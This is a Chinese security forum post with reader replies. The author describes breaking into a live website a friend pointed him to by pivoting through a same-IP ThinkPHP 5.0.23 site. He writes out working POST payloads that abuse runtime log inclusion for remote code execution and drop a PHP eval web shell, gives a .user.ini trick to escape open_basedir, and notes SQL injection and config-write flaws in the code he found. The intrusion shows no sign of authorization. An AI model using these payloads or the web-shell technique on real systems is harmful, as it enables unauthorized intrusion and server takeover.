用户
搜索
  • TA的每日心情
    开心
    2018-12-11 19:06
  • 签到天数: 9 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    17

    主题

    58

    帖子

    519

    魔法币
    收听
    1
    粉丝
    2
    注册时间
    2016-6-22

    i春秋签约作者

    发表于 2020-7-9 01:12:59 77028
    本帖最后由 佳哥 于 2020-7-9 01:18 编辑

    一、同IP渗透
    最近朋友发了个站叫我看看,打开一看,发现是TP3.2.3开发的,本想直接利用tp3可以直接查看runtime日志来获取他的后台账号密码的,发现并没有开启debug模式,所以无法查看到日志信息。

    1.png

    随便注册了一个账号进去,看有没有注入,无果。对这个站进行信息收集,进行同ip的反查,发现7个地址。

    2.png

    每个域名又是不同的源码发开的,发现一个thinkphp5.0.23的网站,可以利用rce

    3.png

    发现无法直接执行代码,需要利用runtime日志或者session来进行文件包含获取shell,这里利用runtime日志来进行文件包含getshell,先写入日志。

    4.png


    利用日志进行包含,post发送:

    _method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../runtime/log/202007/08.log&x=phpinfo();


    5.png

    写入shell:

    _method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../runtime/log/202007/08.log&c=fputs(fopen('x.php','w'),'<?php eval($_POST[c]);?>');


    6.png

    成功getshell,由于是宝塔搭建的,无法访问其他路径,这里可以在新的文件上传一个.user.ini,再在这个文件上传一个一句话,就能成功访问其他目录了,.user.ini内容为:

    open=basedir=


    7.png

    重新尝试访问www目录,成功

    8.png



    这样就成功拿下主站的权限的,发现主站的代码,fofa查了下,有很多使用这套诈骗源码开发的,就下载了下来审计了下。
    二、代码审计

    发现前台sql注入,没有任何过滤

    9.png

    由于需要开启debug模式才会生效

    10.png

    这个诈骗源码太多注入了,就不看其他的了,全局查找file_put_contents,发现后台可以写入配置文件getshell

    11.png

    他明明都使用了var_export函数,却要添加一个stripslashes去掉转义符,构造如下payload

    12.png

    访问文件,成功写入phpinfo

    13.png
    三、后记
    文章写的有点菜,望大佬门不要喷我。。。。。。。。。

    本帖被以下淘专辑推荐:

    佳哥牛批
    使用道具 举报 回复
    佳哥,DDDD啊
    使用道具 举报 回复
    满满的干货,正在学习审计,好好学习下大神的姿势
    使用道具 举报 回复
    发表于 2020-7-9 10:30:33
    后续的渗透部分可以再深入点,佳哥,不过已经挺牛批的了,学习了
    使用道具 举报 回复
    发表于 2020-7-9 17:58:25
    学到了,好姿势
    My blog :http://www.e-wolf.top
    使用道具 举报 回复
    发表于 2020-7-11 17:55:24
    66666666666666666
    使用道具 举报 回复
    发表于 2020-7-22 14:40:53

    眼睛:会了,脑子:不,你不会
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册